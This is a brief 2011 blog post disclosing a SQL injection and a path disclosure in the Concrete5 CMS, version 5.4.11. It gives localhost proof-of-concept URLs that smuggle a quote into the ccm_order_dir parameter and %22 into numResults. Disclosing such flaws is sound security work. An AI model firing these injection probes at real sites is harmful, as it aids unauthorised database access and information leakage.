Saturday 19 November 2011

SQLi/Info Disclo in Concrete 5.4.11


Another old bug...

# --------------------------------------------------------------------------- #
# - Title      : SQL Injection/Info Disclosure in Concrete 5.4.11
# - Tested on      : Ubuntu
# - Date      : 3o.o3.2o11
# - Download Link : sourceforge.net
# - Author      : ;)
# - Greetz      :
# --------------------------------------------------------------------------- #

1. Log in to CMS.
2. Go to:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?&ccm_order_by=fDateAdded&ccm_order_dir='rap&searchInstance=file1301504000
3. Thats it!

* path disclo is also here:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?searchInstance=file1301504000&submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=aaa&numResults=%22&searchField=&selectedSearchField[]=&ccm-search-files=Search
# regards,
# .

No comments:

Post a Comment

What do You think...?